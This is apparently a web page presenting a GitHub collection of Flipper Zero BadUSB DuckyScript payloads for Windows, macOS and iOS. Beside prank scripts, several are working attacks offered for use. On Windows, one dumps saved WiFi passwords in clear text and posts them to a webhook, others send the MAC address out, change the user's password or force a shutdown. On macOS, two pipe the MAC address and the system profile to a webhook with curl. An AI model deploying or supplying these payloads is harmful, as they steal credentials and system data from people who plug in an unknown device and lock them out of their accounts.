AlarmGreen
REM Alarm — Windows
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -W H -C "[console]::beep(1000,500)"
ENTER
BadUSB payloads are DuckyScript® scripts that the Flipper Zero executes by emulating a USB keyboard — automatically running commands, opening terminals, or collecting system info upon connection.
Use these only on your own devices or with explicit written permission. Unauthorized use is illegal. Collection by bst04 · github.com/bst04/payloads_flipperZero · GPL-3.0
REM Alarm — Windows
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -W H -C "[console]::beep(1000,500)"
ENTER
REM Join Discord Server
REM ⚠ Replace INVITE_CODE
DELAY 1000
GUI r
DELAY 500
STRING https://discord.gg/INVITE_CODE
ENTER
REM Spam 10 cmd terminals
DELAY 1000
DEFAULT_DELAY 300
REPEAT 10
GUI r
DELAY 400
STRING cmd
ENTER
REM Rick Roll via browser
DELAY 1000
GUI r
DELAY 500
STRING https://youtu.be/dQw4w9WgXcQ
ENTER
REM Fake BSOD popup
DELAY 1000
GUI r
DELAY 500
STRING powershell -c "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('CRITICAL_PROCESS_DIED','Error',0,16)"
ENTER
REM BAT prank — msg popup
DELAY 1000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 600
STRING echo msg * Hacked > %tmp%\p.bat && %tmp%\p.bat
ENTER
REM Change User Password
DELAY 1000
GUI r
DELAY 500
STRING cmd /k net user %USERNAME% NewPass123!
ENTER
REM Check Battery Status
DELAY 1000
GUI r
DELAY 500
STRING powershell -c "Get-WmiObject Win32_Battery | Select EstimatedChargeRemaining"
ENTER
REM Battery Report via BAT file
DELAY 1000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 600
STRING powercfg /batteryreport /output "%userprofile%\battery.html" && start "%userprofile%\battery.html"
ENTER
REM Open Website via Run
DELAY 1000
GUI r
DELAY 500
STRING https://github.com/bst04/payloads_flipperZero
ENTER
REM Open Website via BAT
DELAY 1000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 600
STRING echo start https://github.com/bst04 > %tmp%\o.bat && %tmp%\o.bat
ENTER
REM PC Login automation
DELAY 500
SPACE
DELAY 500
STRING YourPasswordHere
ENTER
REM Shutdown immediately
DELAY 1000
GUI r
DELAY 500
STRING shutdown /s /t 0
ENTER
REM Get MAC Address → Webhook
REM ⚠ Replace WEBHOOK_URL
DELAY 1000
GUI r
DELAY 500
STRING powershell -c "getmac | Invoke-RestMethod -Uri 'WEBHOOK_URL' -Method POST"
ENTER
REM Get WiFi Passwords → Webhook
REM ⚠ Replace WEBHOOK_URL
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 800
STRING (netsh wlan show profiles) | % { netsh wlan show profile $_ key=clear } | Invoke-RestMethod -Uri 'WEBHOOK_URL' -Method POST
ENTER
This library is open source and community-driven. Fork the repo, add your .txt payload following the existing structure, and open a pull request. All platforms are welcome.
REM Change Discord Name — macOS
DELAY 1000
GUI SPACE
DELAY 500
STRING Discord
ENTER
DELAY 1500
STRING Hacked by Flipper Zero 🐬
ENTER
REM Open All Applications — macOS
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 1000
STRING ls /Applications/*.app | xargs -I {} open "{}"
ENTER
REM Get MAC Address → Webhook — macOS
REM ⚠ Replace WEBHOOK_URL
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 800
STRING ifconfig en0 | grep ether | awk '{print $2}' | curl -X POST -d @- WEBHOOK_URL
ENTER
REM Send System Profile → Webhook — macOS
REM ⚠ Replace WEBHOOK_URL
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 800
STRING system_profiler SPSoftwareDataType SPHardwareDataType | curl -X POST -d @- WEBHOOK_URL
ENTER
REM Pop Up dialog — macOS
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 800
STRING osascript -e 'display dialog "Hacked by Flipper Zero!" with title "Warning"'
ENTER
REM Open Repository in Safari
DELAY 1000
GUI SPACE
DELAY 500
STRING https://github.com/bst04/payloads_flipperZero
ENTER
REM Force macOS Software Update
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 800
STRING softwareupdate --all --install --force
ENTER
Got a macOS script that works? Fork the repo and open a pull request — all contributions are welcome.
REM Text Someone — iOS
REM ⚠ Requires contact configured
DELAY 1000
HOME
DELAY 500
STRING Hacked by Flipper Zero 🐬
ENTER
REM RickRoll Contacts — iOS
DELAY 1000
HOME
DELAY 500
STRING https://youtu.be/dQw4w9WgXcQ
ENTER
REM Open Repository — iOS
DELAY 1000
HOME
DELAY 500
STRING https://github.com/bst04/payloads_flipperZero
ENTER
iOS payloads are tricky. If you have one that works reliably, please share it by opening a pull request.